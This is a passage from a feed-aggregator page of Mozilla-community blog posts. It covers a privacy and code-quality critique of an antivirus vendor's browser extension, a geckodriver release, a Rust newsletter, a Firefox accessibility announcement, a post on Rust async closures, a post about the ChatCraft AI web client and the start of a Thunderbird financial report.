Whenever you open some extension page, when you click something in the extension, if you merely sneeze near the extension, it will send a tracking event to track.atom-ds.com. The request looks like this:

POST / HTTP/1.1
Host: track.atom-ds.com
Content-Type: text/plain;charset=UTF-8
Content-Length: 438

{
  "auth": "",
  "data": "[{
    \"clientcreated\":1683711797044,
    \"extension_id\":\"llbcnfanfmjhpedaedhbcnpgeepdnnok\",
    \"version\":\"3.13.1\",
    \"random_number\":902,
    \"action\":\"click\",
    \"product\":\"rav_extension\",
    \"screenid\":\"home_tab\",
    \"button\":\"see_more\",
    \"screencomponentname\":\"notifications\",
    \"status\":\"2_notifications_blocked\",
    \"ext_uid\":\"2362740a-6bba-40d6-8047-898a3b4423d5\"
  }]",
  "table": "digital_solutions_cyber_extensions_ui"
}

The ext_uid field here is the persistent user identifier we’ve seen as x-userid HTTP header before.

Now this kind of tracking might not be unusual. It’s being disclosed in the privacy policy:

(ii) time and date of certain events related to the Software (such as launching and scanning, updating and uninstalling the Software), activity log of your use of the Software and the most used features of the Software

With the supposed purpose:

To provide, support and operate the Software as well as to further develop, enhance and improve our Software and your user experience with our Software.

Of course, it would have been nice for such functionality to be opt-in, but who would object against their favorite browser extension being improved?

Well, it would also have been nice to say that this data is not being stored together with the user identifier. But it probably is, so that ReasonLabs has user profiles containing both browsing history and the user’s extension usage.

I wonder however: who runs the atom-ds.com domain? The privacy policy claims that Google Analytics is being used for monitoring, but this isn’t the Google Analytics domain. Online Security probably used Google Analytics in the past, but it doesn’t right now.

I also doubt that the domain is owned by ReasonLabs. This domain is listed in various tracking protection lists, it must be some company in the business of monitoring users. And ReasonLabs failed listing this third party in their privacy policy.

Code quality issues

None of this means of course that browser extensions created by antivirus vendors cannot be useful. But they tend not to be. Which in my opinion is likely a question of priorities: for an antivirus vendor, their browser extension is never a priority. And so they don’t hire any expertise to develop it.

This lack of expertise is how I explain the common pattern of providing a minimal extension and then escaping into a native application as soon as possible. That’s not what Online Security developers did however, their extension is largely independent of the antivirus product.

The result isn’t exactly instilling confidence however. It has an unused page called newtab.html titled “Chrome Extension Boilerplate (with React 16.6+ & Webpack 4+).” It seems that they used a publicly available extension boilerplate and failed to remove the unnecessary parts. As a result, their extension contains among other things unused files newtab.bundle.js and panel.bundle.js weighting 190 KiB each.

But not only that. It contains its own copy of the Google Analytics script (another 140 KiB), also unused of course. I am fairly certain that copying this script violates Google’s license terms.

There are also more serious issues with the code. For example, there is a hardcoded list with almost 500 domains:

[
  "birkiesdipyre.com",
  "birlerskababs.com",
  
  "hegrem.com",
  "hehraybryciyls.com"
].forEach((domain, index) =>
{
  chrome.declarativeNetRequest.updateDynamicRules({
    addRules: [{
      id: index + 1,
      priority: 1,
      action: {
        type: "redirect"
        redirect: {
          url: chrome.runtime.getURL("/index.html?url=http://"+btoa(domain)+"#/Blocked")
        }
      },
      condition: {
        urlFilter: domain,
        resourceTypes: ["main_frame"]
      }
    }]
  });
});

It sort of makes sense to block some domains unconditionally, even if ReasonLabs’ server is down. It doesn’t make sense to use only domains starting with letters B to H however. No idea why the full list isn’t used here. It cannot be the package size, as there would have been obvious ways to cut down on this one (see above).

Note also that the condition uses the urlFilter keyword rather than initiatorDomains. So instead of blocking only these domains, they blocked every address where these domain names can be found – which could be e.g. websites writing about these domains.

And the redirect target? They’ve put http:// outside the btoa() call, so the page cannot decode the url parameter and renders blank. It seems that this functionality hasn’t been tested at all.

That’s just the obvious mistakes in a small piece of code. Another typical bug looks like this:

var hostname = new URL(url).hostname.replace("www.", "");

Clearly, the intention is to remove www. prefix at the start of a host name. Instead, this will remove www. anywhere in the host name. So gwww.oogle.com for example becomes google.com.

And that’s a pattern used all over the codebase. It’s used for removing cookies, deleting browsing data, setting site permissions. All of this could potentially be misdirected to an unrelated website.

For example, here is what the notifications settings display after I opened the extension’s “Blocked website” page for gwww.oogle.com:

Page titled “Notifications control” listing two sources: gwww.oogle.com and suspendeddomain.org. The former is underlined with a thick red line.

And here is what the cookie settings show:

Page titled “Cookies and trackers” listing two sources: google.com and suspendeddomain.org. The former is underlined with a thick red line.

Conclusion

As we’ve seen, Online Security provides little to no value compared to functionality built into browsers or available for free. At the same time, it implements its functionality in a massively privacy-invading way. That’s despite better solutions to the problem being available for more than a decade and being widely publicized along with their shortcomings.

At the same time, code quality issues that I noticed in my glimpse of the extension’s source code aren’t exactly confidence instilling. As so often with antivirus vendors, there is little expertise and/or priority developing browser extensions.

If you really want to secure your browsing, it’s advisable to stay away from Online Security and similar products by antivirus vendors. What makes sense is an ad blocker, possibly configured to block trackers as well. And the antivirus better stays outside your browser.

Mind you, Windows Defender is a perfectly capable antivirus starting with Windows 10, and it’s installed by default. There is little reason to install a third-party antivirus application.

Firefox Developer ExperienceGeckodriver 0.33.0 Released

We are proud to announce the next major release of geckodriver 0.33.0. It ships with some new features that have been often requested by the WebDriver community, and as such brings geckodriver closer to the full WebDriver classic compatibility.

New Features

Support for “Get Computed Label” and “Get Computed Role”

To help various developers who are working on accessibility tests, and also our own colleagues at Mozilla who are improving accessibility APIs within Gecko (eg. as part of the Interop 2023 work) two APIs from the WebDriver classic specification have been implemented.

The command Get Computed Label returns the accessibility label (sometimes
also referred to as Accessible Name), which is a short string that labels the
function of the control (e.g. the string “Comment” or “Sign In” on a button).

Example that shows how to retrieve the accessibility label for an element on a web page:

def test_get_computed_label(session, inline):
    session.url = inline('<button aria-label="sign-in">Sign In</button>')
    element = session.find.css('button', all=False)
    assert_success(element.computed_label, 'sign-in')

The command Get Computed Role returns the reserved token value (in ARIA,
button, heading, etc.) that describes the type of control or content in the
element.

Example that shows how to retrieve the accessibility label for an element on a web page:

def test_computed_role(session, inline):
    session.url = inline('<input role="searchbox">')
    element = session.find.css('input', all=False)
    assert_success(element.computed_role, 'searchbox')

Please note that for both APIs the minimum required Firefox version is 113.0, which currently is on the Beta Channel.

Support for “Find Element From Shadow Root” and “Find Elements From Shadow Root”

The commands allow a lookup of individual elements or collections of elements
within an open or even closed Shadow DOM. All location strategies except Tag name and
XPath selector are currently supported.

Example that shows how to retrieve an input element that is part of a custom element’s Shadow DOM, and afterward simulating a key input by a user:

def test_find_elements(session, inline):
    session.url = inline('<custom-element>')  # Shadow DOM with input element
    custom_el = session.find.css('custom-element', all=False)
    input_el = custom_el.shadow_root.find.css('input', all=False)
    input_el.send_keys('foo')

Note that the minimum required Firefox version is 113.0 for both APIs.

Changes

  • We have deprecated the usage of the moz:useNonSpecCompliantPointerOrigin capability. This boolean capability was used to indicate how the pointer origin for an action command will be calculated. If enabled the offset position was determined by the top-left corner of the given element origin instead of it’s in-view center point.

    If any of your code relies on this particular Firefox only capability set to True it needs to be adjusted to work with the capability’s value set to False or removed.

    The removal of the capability will happen with Firefox 116, which means the next Firefox 115 ESR release will still support it for another year while getting security updates.

Downloads

As usual links to the pre-compiled binaries for popular platforms and the source code is available on the GitHub repository.

This Week In RustThis Week in Rust 494

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on Twitter or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Official
Newsletters
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is dlhn, a serde-compatible serialization format geared for performance.

Thanks to Shogo Otake for the self-suggestion!

Please submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Calls for Proposals

Open calls for submissions to conferences and meetups.

Updates from the Rust Project

386 pull requests were merged in the last week

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
New and Updated RFCs
Call for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

  • No RFCs issued a call for testing this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Upcoming Events

Rusty Events between 2023-05-10 - 2023-06-07 🦀

Virtual
Asia
Europe
North America
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

Thanks to all for the very helpful responses. "The Book" says The community is very welcoming and happy to answer students’ questions "; I expected that to be just marketing, but I was wrong."

Daryl Lee on rust-users

Thanks to evann for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, andrewpollack, U007D, kolharsam, joelmarcey, mariannegoldin, bennyvasquez.

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

The Mozilla BlogFirefox 113 significantly boosts accessibility performance

An illustration shows the Firefox logo, a fox curled up in a circle.

About five years ago Mozilla shipped Firefox Quantum, an upgrade that included significant performance improvements for most Firefox users. Unfortunately, Firefox Quantum didn’t improve performance for people who use screen readers and other assistive technology. In some ways, our screen reader performance actually regressed with the architecture changes that Quantum delivered.

The Firefox accessibility engineers remedied much of that performance regression in the late twenty-teens, but by 2020 they’d done all they could to keep up. Continued investment in the old architecture simply wasn’t going to be enough to maintain a competitive browser so we began planning a re-write, which became a project called Cache the World. This upgrade changes the way things work in Firefox’s accessibility code so that screen readers and other assistive technologies have fast access to the content they need.

Today, with the release of Firefox 113, those improvements are available to all Firefox users on Windows, Mac, Linux, and Android.

Browsers are more complicated today than when Firefox’s accessibility engine was first designed, and the most significant overall change has been the move to security-isolated, multi-process architectures. With multiple isolated processes, screen readers had to do a lot of expensive work to retrieve and relay content to users. We were inspired by Chrome’s approach and extended it to improve Firefox’s accessibility performance; Firefox now provides a cache of all tab and browser UI content to screen readers in the browser’s parent process, where it can be used quickly and very easily.

This blog post by accessibility tech lead Jamie Teh provides more context and technical details on the project, but the largest impact you’ll notice immediately is speed. For some of the worst use cases — like pages with very large tables — Firefox now performs up to 20 times faster, and we’re clocking other very large pages at 10 times faster! However, even for the most everyday actions, like opening and closing a Gmail message or switching channels in a Slack window, the performance is 2 to 3 times better.

This upgrade shipped for Android last year in the Firefox 102 release, for Windows and Linux in the Firefox 112 release, and today it arrives on MacOS, which completes our rollout to all Firefox platforms. We’re very excited to be delivering this performance and stability improvement to you all, and we’re eager to hear your feedback and answer questions. Please let us know what you think about these changes in a comment on this post, and if you’ve found something broken, report it in a Bugzilla ticket. Got a completely different idea for making Firefox accessibility better? Please join us on and share via Mozilla Connect.

Asa Dotzler, on behalf of the Firefox accessibility team: Jamie Teh, Eitan Isaacson, Morgan Rae Reschenberg, Anna Yeddi, Nathan LaPré, and Kim Bryant

Get Firefox

Get the browser that protects what’s important

The post Firefox 113 significantly boosts accessibility performance appeared first on The Mozilla Blog.

Niko MatsakisGiving, lending, and async closures

In a previous post on async closures, I concluded that the best way to support async closures was with an async trait combinator. I’ve had a few conversations since the post and I want to share some additional thoughts. In particular, this post dives into what it would take to make async functions matchable with a type like impl FnMut() -> impl Future<Output = bool>. This takes us down some interesting roads, in particular the distinction between giving and lending traits; it turns out that the closure traits specifically are a bit of a special case in turns of what we can do backwards compatibly, due to their special syntax. on!

Goal

Let me cut to the chase. This article lays out a way that we could support a notation like this:

fn take_closure(x: impl FnMut() -> impl Future<Output = bool>) { }

It requires some changes to the FnMut trait which, somewhat surprisingly, are backwards compatible I believe. It also requires us to change how we interpret -> impl Trait when in a trait bound (and likely in the value of an associated type); this could be done (over an Edition if necessary) but it introduces some further questions without clear answers.

This blog post itself isn’t a real proposal, but it’s a useful ingredient to use when discussing the right shape for async clsoures.

Giving traits

The split between Fn and async Fn turns out to be one instance of a general pattern, which I call “giving” vs “lending” traits. In a giving trait, when you invoke its methods, you get back a value that is independent from self.

Let’s see an example. The current Iterator trait is a giving trait:

trait Iterator {
    type Item;
    fn next(&mut self) -> Option<Self::Item>;
    //      ^ the lifetime of this reference
    //        does not appear in the return type;
    //        hence "giving"
}

In Iterator, each time you invoke next, you get ownership of a Self::Item value (or None). This value is not borrowed from the iterator.1 As a consumer, a giving trait is convenient, because it permits you to invoke next multiple times and keep using the return value afterwards. For example, this function compiles and works for any iterator (playground):

fn take_two_v1<T: Iterator>(t: &mut T) -> Option<(T::Item, T::Item)> {
    let Some(i) = t.next() else { return None };
    let Some(j) = t.next() else { return None };
    // *Key point:* `i` is still live here, even though we called `next`
    // again to get `j`.
    Some((i, j))
}

Lending traits

Whereas a giving trait gives you ownership of the return value, a lending trait is one that returns a value borrowed from self. This pattern is less common, but it certainly appears from time to time. Consider the AsMut trait:

trait AsMut<T: ?Sized> {
    fn as_mut(&mut self) -> &mut T;
    //        -             -
    // Returns a reference borrowed from `self`.
}

AsMut takes an &mut self and (thanks to Rust’s elision rules) returns an &mut T borrowed from it. As a caller, this means that so long as you use the return value, the self is considered borrowed. Unlike with Iterator, therefore, you can’t invoke as_mut twice and keep using both return values (playground):

fn as_mut_two<T: AsMut<String>>(t: &mut T) {
    let i = t.as_mut(); // Borrows `t` mutably
    
    let j = t.as_mut(); // Error: second mutable borrow
                        // while the first is still live
    
    i.len();            // Use result from first borrow
}

Lending iterators

Of course, AsMut is kind of a “trivial” lending trait. A more interesting one is lending iterators2. A lending iterator is an iterator that returns references into the iterator self. Typically this is because the iterator has some kind of internal buffer that it uses. Until recently, there was no lending iterator trait because it wasn’t even possible to express it in Rust. But with generic associated types (GATs), that changed. It’s now possible to express the trait, although there are borrow checker limitations that block it from being practical3:

trait LendingIterator {
    type Item<'this>
    where
        Self: 'this;
    
    fn next(&mut self) -> Option<Self::Item<'_>>;
    //      ^                        ^^
    // Unlike `Iterator`, returns a value
    // potentially borrowed from `self`.
}

As the name suggests, when you use a lending iterator, it is lending values to you; you have to “give them back” (stop using them) before you can invoke next again. This gives more freedom to the iterator: it has the ability to use an internal mutable buffer, for example. But it takes some flexibility from you as the consumer. For example, the take_two function we saw earlier will not compile with LendingIterator (playground):

fn take_two_v2<T: LendingIterator>(
    t: &mut T,
) -> Option<(T::Item<'_>, T::Item<'_>)> {
    let Some(i) = t.next() else { return None };
    let Some(j) = t.next() else { return None };
    // *Key point:* `i` is still live here, even though we called `next`
    // again to get `j`.
    Some((i, j))
}

An aside: Inherent or accidental complexity?

It seems kind of annoying that Iterator and LendingIterator are two distinct traits. In a GC’d language, they wouldn’t be. This is a good example of what makes using Rust more complex. On the other hand, it’s worth asking, is this inherent or accidental complexity? The answer, I think, is “it depends”.

For example, I could certainly write an Iterator in Java that makes use of an internal buffer:

class Compute
    implements Iterator<ByteBuffer>
{
    ByteBuffer shared = new ByteBuffer(256);
    
    ByteBuffer next() {
        if (mutateSharedBuffer()) {
            return shared.asReadOnlyBufer();
        }
        return null;
    }
    
    /// Mutates `shared` and return true if there is a new value.
    private boolean mutateSharedBuffer() {
        // ...
    }
}

Despite the fact that Java has no way to express the concept, this is most definitely a lending iterator. If I try to write a function that invokes next twice, the first value will simply not exist anymore:

Compute c = new Compute();
ByteBuffer a = c.next();
ByteBuffer b = c.next();
byte a0 = a.get(); // a has been overwritten with b..
byte b0 = b.get(); // ..so `a0 == b0` is always true.

In a case like this, Rust’s distinctions are expressing inherent complexity4. If you want to have a shared buffer that you reuse between calls, Java makes it easy to make mistakes. Rust’s ownership rules force you to copy out data that you want to keep using, preventing bugs like the one above. Eventually people learn to adopt functional patterns or to clone data instead of sharing access to mutable state. But that requires time and experience, and the compiler and language isn’t helping you do so (unless you use, say, Haskell or O’Caml or some purely functional language). These kinds of patterns are a good example of why Rust code winds up having that “if it compiles, it works” feeling, and how the same machinery that guarantees memory safety also prevents logical bugs.

Iterator as a special case of LendingIterator

OK, so we saw that the Iterator and LendingIterator trait, while clearly related, express an important tradeoff. The Iterator trait declares up front that each Item is independent from the iterator, but the LendingIterator declares that the Item<'_> values returned may be borrowed from the iterator. This affects what fully generic code (like our take_two function) can do.

But note a careful hedge: I said that the LendingIterator trait declares that Item<'_> calues may be borrowed from the iterator. They don’t have to be. In fact, every Iterator can be viewed as a LendingIterator (as you can see in this playground), much like every FnMut (which takes an &mut self) can be viewed as a Fn (which takes an &self). Essentially an Iterator is “just” a LendingIterator that doesn’t happen to make use of the 'a argument when defining its Item<'a>.

It’s also possible to write a version of take_two that uses LendingIterator but compiles (playground)5:

fn take_two_v3<T, U>(t: &mut T) -> Option<(U, U)> 
where
    T: for<'a> LendingIterator<Item<'a> = U>
    // ^^^^^^                             ^
    // No matter which `'a` is used, result is always `U`,
    // which cannot reference `'a` (after all, `'a` is not
    // in scope when `U` is declared).
{
    let Some(i) = t.next() else { return None };
    let Some(j) = t.next() else { return None };
    Some((i, j))
}

The key here is the where-clause. It says that T::Item<'a> is always equal to U, no matter what 'a is. In other words, the item that is produced by this iterator is never borrowed from self – if it were, then its type would include 'a somewhere, as that is the lifetime of the reference to the iterator. As a result, take_two compiles successfully. Of course, it also can’t be used with LendingIterator values that actually make use of the flexibility the trait is offering them.

Can we “unify” Iterator and LendingIterator?

The fact that every iterator is just a special case of lending iterator begs the question, can they be unified? Jack Huey, in the runup to GATs, spend a while exploring this question, and concluded that it doesn’t work. To see why, imagine that we changed Iterator so that it had type Item<'a>, instead of just type Item. It’s easy enough to imagine that existing code that says T: Iterator<Item = u32> could be reinterpreted as for<'a> T: Iterator<Item<'a> = u32>, and then it ought to continue compiling. But the scheme doesn’t quite work precisely because of examples like take_two_v1:

fn take_two_v1<T: Iterator>(t: &mut T) -> Option<(T::Item, T::Item)> {...}

This signature just says that it takes an Iterator; it doesn’t put any additional constraints on it. If we’ve modified Iterator to be a lending iterator, then you can’t take two items independently. So we would have to have some way to say “any giving iterator” vs “any lending iterator” – and if we’re going to say those two things, why not make it two distinct traits?

FnMut is a giving trait

I started off this post talking about async closures, but so far I’ve just talked about iterators. What’s the connection? Well, for starters, the distinction between sync and async closures is precisely the difference between giving and lending closures.

Sync closures (at least as defined now) are giving traits. Consider a (simplified) view of the FnMut trait as an example:

trait FnMut<A> {
    type Output;
    fn call(&mut self, args: A) -> Self::Output;
    //      ^                      ^^^^^^^^^^^^
    // The `self` reference is independent from the
    // return type.
}

FnMut returns a Self::Output, just like the giving Iterator returns Self::Item.

FnMut has special syntax

You may not be accustomed to seeing the FnMut trait as a regular trait. In fact, on stable Rust, we require you to use special syntax with FnMut. For example, you write impl FnMut(u32) -> bool as a shorthand for FnMut<(u32,), Output = bool>. This is not just for convenience, it’s also because we have planned for some time to make changes to the FnMut trait (e.g., to make it variadic, rather than having it take a tuple of argument types), and the special syntax is meant to leave room for that. Pay attention here: this special syntax turns out to have an important role.

Async closures are a lending pattern

Async closures are closures that return a future. But that future has to capture self. So that makes them a kind of lending trait. Imagine we had a LendingFnMut:

trait LendingFnMut<A> {
    type Output<'this>
    where
        Self: 'this;
    
    fn call(&mut self, args: A) -> Self::Output<'_>;
    //      ^                                  ^^^^
    // Lends data from `self` as part of return value.
}

Now we could (not saying we should) express an async closure as a kind of bound on Output:

// Imagine we want something like this...
async fn foo(x: async FnMut() -> bool) {...}

// ...that is kind of this:
async fn foo<F>(f: F)
where
    F: LendingFnMut<()>,
    for<'a> F::Output<'a>: Future<Output = bool>
{
    ...
}

What is going on here? We saying first that f is a lending closure that takes no arguments F: LendingFnMut<()>. Note that we are not using the special FnMut sugar here, so this constraint says nothing about the value of Output. Then, in the next where-clause, we are specifying that Output implements Future<Output = bool>. Importantly, we never say what F::Output is. Just that it will implement Future. This means that it could include references to self (but it doesn’t have to).

Note what just happened. This is effectively a “third option” for how to desugar some kind of async closures. In my [previous post], I talked about using HKT and about transforming the FnMut trait into an async variant (async FnMut). But here we see that we could also have a lending variant of the trait and then bound the Output of that to implement Future.

Closure syntax gives us more room to maneuver

So, to recap things we have seen:

  • Giving vs lending traits is a fundamental pattern:
    • A giving trait has a return value that never borrows from self
    • A lending trait has a return value that may borrow from self
  • Giving traits are subtraits of lending traits; i.e., you can view a giving trait as a lending trait that happens not to lend.
  • We can’t convert Iterator to a lending trait “in place”, because functions that are generic over T: Iterator rely on it being the giving pattern.
  • Async closures are expressible using a lending variant of FnMut, but not the current trait, which is the giving version.

Given the last two points, it might seem logical that we also can’t convert FnMut “in place” to the lending version, and that therefore we have to add some kind of separate trait. In fact, though, this is not true, and the reason is because of the forced closure syntax. In particular, it’s not possible to write a function today that is generic over F: FnMut<A> but doesn’t specify a specific value for the Output generic type. When you write F: FnMut(u32), you are actually specifying F: FnMut<(u32,), Output = ()>. It is possible to write generic code that talks about F::Output, but that will always be normalizable to something else, because adding the FnMut bound always includes a value for Output.

In principle, then, we could redefine the Output associated type to take a lifetime parameter and change the desugaring for F: FnMut() -> R to be for<'a> F: FnMut<(), Output<'a> = R>. We would also have to make F::Output be legal even without specifying a value for its lifetime parameter; there are a few ways we could do that.

How to interpret impl Trait in the value of an associated type

Let’s imagine that we changed the Fn* to be lending traits, then. That’s still not enough to support our original goal:

fn take_closure(x: impl FnMut() -> impl Future<Output = bool>) { }
//                                 ^^^^
// Impl trait is not supported here.

The problem is that we also have to decide how to desugar impl Trait in this position. The interpretation that we want is not entirely obvious. We could choose to desugar -> impl Future as a bound on the Output type, i.e., to this:

fn take_closure<F>(x: F) 
where
    F: FnMut<()>,
    for<'a> <F as FnMut<()>>::Output<'a>: Future<Output = bool>.
{ }

If we did this, then the Output value is permitted to capture 'a, and hence we are taking advantage of FnMut being a lending closure. This means that, when we call the closure, we have to await the resulting future before we can call again, just like we wanted.

Complications

Interpreting impl Trait this way is a bit tricky. For one thing, it seems inconsistent with how we interpret impl Trait in a parameter like impl Iterator<Item = impl Debug>. Today, that desugars to two fresh parameters <F, G> where F: Iterator<Item = G>, G: Debug. We could probably change that without breaking real world code, since if the associated type is not a GAT I don’t think it matters, but we also permit things like impl Iterator<Item = (impl Debug, impl Debug)> that cannot be expressed as bounds. RFC #2289 proposed a new syntax for these sorts of bounds, such that one would write F: Iterator<Item: Debug> to express the same thing. By analogy, one could imagine writing F: FnMut(): Future<Output = bool>, but that’s not consistent with the -> impl Future that we see elsewhere. It feels like there’s a bit of a tangle of string to sort out here if we try to go down this road, and I worry about winding up with something that is very confusing for end-users (too many subtle variations).

Conclusion

To recap all the points made in this post:

  • Giving vs lending traits is a fundamental pattern:
    • A giving trait has a return value that never borrows from self
    • A lending trait has a return value that may borrow from self
  • Giving traits are subtraits of lending traits; i.e., you can view a giving trait as a lending trait that happens not to lend.
  • We can’t convert Iterator to a lending trait “in place”, because functions that are generic over T: Iterator rely on it being the giving pattern.
  • Async closures are expressible using a lending variant of FnMut, but not the current trait, which is the giving version.
  • It is possible to modify the Fn* traits to be “lending” by changing how we desugar F: Fn, but we have to make it possible to write F::Output even when Output has a lifetime parameter (perhaps only if that parameter is statically known not to be used).
  • We’d also have to interpret FnMut() -> impl Future as being a bound on a possibly lent return type, which would be somewhat inconsistent with how Foo<Bar = impl Trait> is interpreted now (which is as a fresh type).

Hat tip

Tip of the hat to Tyler Mandry – this post is basically a summary of a conversation we had.

Footnotes

  1. There is a subtle point here. If you are iterating over, say, a &[T] value, then the Item you get back is an &T and hence borrowed. It may seem strange for me to say that you get ownership of the &T. The key point here is that the &T is borrowed from the collection you are iterating over and not from the iterator itself. In other words, from the point of view of the Iterator, it is copying out a &T reference and handing ownership of the reference to you. Owning the reference does not give you ownership of the data it refers to. 

  2. Sometimes called “streaming” iterators. 

  3. Not to mention that GATs remain in an “MVP” state that is rather unergonomic to use; we’re working on it! 

  4. Of course, Rust’s notations for expressing these distinctions involve some “accidental complexity” of their own, and you might argue that the cure is worse than the disease. Fair enough. 

  5. This example, by the way, demonstrates how the unergonomic state of GAT support. I don’t love writing for<'a> all the time. 

Mozilla AccessibilityFirefox 113 Significantly Boosts Accessibility Performance

About 5 years ago Mozilla shipped Firefox Quantum, an upgrade that included significant performance improvements for most Firefox users. Unfortunately, Firefox Quantum didn’t improve performance for people who use screen readers and other assistive technology. In some ways, our screen reader performance actually regressed with the architecture changes that Quantum delivered.

The Firefox accessibility engineers remedied much of that performance regression in the late Twenty-Teens, but by 2020 they’d done all they could to keep up. Continued investment in the old architecture simply wasn’t going to be enough to maintain a competitive browser so we began planning a re-write, which became a project called Cache the World. This upgrade changes the way things work in Firefox’s accessibility code so that screen readers and other assistive technologies have fast access to the content they need.

Today, with the release of Firefox 113, those improvements are available to all Firefox users on Windows, Mac, Linux, and Android.

Browsers are more complicated today than when Firefox’s accessibility engine was first designed, and the most significant overall change has been the move to security-isolated, multi-process architectures. With multiple isolated processes, screen readers had to do a lot of expensive work to retrieve and relay content to users. We were inspired by Chrome’s approach and extended it to improve Firefox’s accessibility performance; Firefox now provides a cache of all tab and browser UI content to screen readers in the browser’s parent process, where it can be used quickly and very easily.

This blog post by accessibility tech lead Jamie Teh provides more context and technical details on the project, but the largest impact you’ll notice immediately is speed. For some of the worst use cases — like pages with very large tables — Firefox now performs up to 20 times faster, and we’re clocking other very large pages at 10 times faster! However, even for the most everyday actions, like opening and closing a Gmail message or switching channels in a Slack window, the performance is 2 to 3 times better.

This upgrade shipped for Android last year in the Firefox 102 release, for Windows and Linux in the Firefox 112 release, and today it arrives on MacOS, which completes our rollout to all Firefox platforms. We’re very excited to be delivering this performance and stability improvement to you all, and we’re eager to hear your feedback and answer questions. Please let us know what you think about these changes in a comment on this post, and if you’ve found something broken, report it in a Bugzilla ticket. Got a completely different idea for making Firefox accessibility better? Please join us on and share via Mozilla Connect.

Asa Dotzler, on behalf of the Firefox accessibility team: Jamie Teh, Eitan Isaacson, Morgan Rae Reschenberg, Anna Yeddi, Nathan LaPré, and Kim Bryant

The post Firefox 113 Significantly Boosts Accessibility Performance appeared first on Mozilla Accessibility.

David HumphreyChatCraft.org

I've been continuing my experiments with AI development.  I wrote previously about my attempts to use ChatGPT more intentionally, as a way to better understand how my students are encountering it.  Since then, I've been focusing on contributing to https://chatcraft.org/ and wanted to talk about what it is and what it's been like to build it.

My recent AI posts prompted an old friend from my Mozilla days (Taras Glek) to reach out on Twitter.  He wanted to talk about our shared interest in AI and programming.  Both of us learned to program long before AI, but we also see the tremendous potential of using AI to accelerate our work going forward.  We've also been finding that many of our colleagues and peers aren't as interested as we are, and having someone else to talk to and work with on this stuff has been important.

Taras wanted to show me an experiment he'd been building to create his own open source, programming-focused, ChatGPT web client.  It already had a lot of cool features like being able to render Mermaid diagrams and HTML in responses from the ChatGPT API.  He'd also hooked up langchainjs, which is a project I've been following with interest.

Seeing a pure browser-based web app (no server-side code) really inspired me.  For some reason, all of my AI work thus far has been done using two-tier web apps or with node.js all on the server.  I don't know why it never occurred to me to do all of this in the browser.  Seeing what Taras was doing, it all suddenly clicked for me: I really want my AI to be in the browser.

Before this, I was using various AI Assistants in VSCode to see what that's like.  I've tried Cody from Sourcegraph, Amazon CodeWhisperer, and a few more.  So far this process has convinced me that what I really want is the ability to reason with, and explore ideas in code with an AI vs. having it dump suggestions in my editor.  I love having this be a browser tab vs. an editor extension.

Like me, Taras had started using GPT via the OpenAI Playground.  We both loved it.  You could try things in a web page, use it or delete it, and keep trying again until you were happy. It was so easy to experiment.  The ephemeral nature of the output (nothing being saved, not integrated with anything you're working on) encouraged playfulness and exploration. Then OpenAI brought out ChatGPT.  I don't need to tell you what it is.  Again, the "it's just a website" phenomenon really struck me.

Rather than give up on his own UI and using ChatGPT, Taras kept going with what he was building.  He wanted to know if I'd help him with the UI.  It felt like old times, when I was building DXR (a web UI) on top of his Dehydra gcc plugins.

Since then I've been working with Taras to rebuild the UI for what's become chatcraft.org.  It's now gotten to the point that I only use it vs ChatGPT or VSCode assistants.  I like how much freedom it gives: paste in your OpenAI API key and you're ready to go.  No logins, annoying rate limits, and the UI and responses are tailored to what a programmer wants vs. being a general purpose chatbot.

I've also loved being able to build it the way that makes sense to us.  I don't have to wait on OpenAI or some other company to give me what I want--I can build it myself.  The cheap and ready access we have to the underlying models, and the flexibility of the web as a UI and rendering platform is amazing.

Another unexpected benefit of having an AI-based project is that it's helped me get over the hump of using AI to program.  I don't naturally think to use AI when programming: I've never had access to one in the past, and old habits die hard.  However, writing an AI app has made it obvious that I should be using AI to build it.  I've had all kinds of help from ChatGPT and GPT-4 while writing the code.

When I'd get stumped on something, I paste in the code and start talking about my bugs.  Because I work in Markdown, it's very similar to writing issues on GitHub.  Often I get what I need back: a push in the right direction and sometimes complete code as well.  I've also been amazed at how it has been able to replace automate tests.  For example, the other day I was working on a bug in the syntax highlighting code, and I worked with ChatCraft on ChatCraft.  I'd ask it for examples of code blocks, fix the code, repeat, ask about bugs I was seeing, fix things, repeat.  Using the app as an AI-REPL is extremely productive and unlike any programming I've done before.  It's like assembling a robot with the robot's help.

I'm excited to try using it for some other AI experiments over the next few months. I have a few other collaborations I'm wanting to do with friends who are interested in AI, and I'm going to suggest we use ChatCraft to do the work.

ChatCraft.org is still pretty young, but I love it and wanted to share.  If you'd like to give it a try and contribute, please do.  Let Taras and I know what you think.

UPDATE: Taras has also written his own post about ChatCraft.

Mozilla ThunderbirdThunderbird Is Thriving: Our 2022 Financial Report

Thunderbird Thriving! 3 stacks of increasingly higher coins, each of them sprouting a small plant.

A few years ago, Thunderbird was in survival mode. Our dedicated core team, passionate community of users, and generous donors kept Thunderbird alive during some difficult times. Then, just last May, we happily reported that Thunderbird’s financial outlook was steadily improving: our 2021 income had increased by 21% over 2020, and by more than 100% over 2018. 

